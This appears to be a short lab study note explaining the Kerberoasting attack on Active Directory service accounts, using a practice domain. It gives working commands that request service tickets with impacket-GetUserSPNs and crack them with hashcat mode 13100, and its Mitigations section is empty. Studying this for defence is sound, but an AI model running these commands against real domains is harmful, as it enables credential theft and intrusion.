🔹 Kerberoasting Explained

image.png

Kerberoasting is an attack that exploits service accounts in Active Directory. Here’s how it works:

  1. User Requests a TGT (Ticket-Granting Ticket)

  2. User Requests a TGS (Service Ticket)

  3. Attacker Captures the Service Ticket

  4. Cracking the Service Account Hash

💡 Key Takeaway:

By obtaining a valid TGT, an attacker can repeatedly request TGS tickets, extract hashes, and attempt to crack them. The tool GetUserSPNs is commonly used to automate this process.

Steps

  1. Get SPNs, Dump Hash

    impacket-GetUserSPNs <DOMAIN>/<username>:<password> -dc-ip <ip-of-DC> -request
    impacket-GetUserSPNs MARVEL.local/fcastle:Password1 -dc-ip 192.168.150.128 -request
    

    image.png

  2. Crack the hash

    hashcat -m 13100 krb.txt rockyou.txt
    

    image.png

    image.png

Mitigations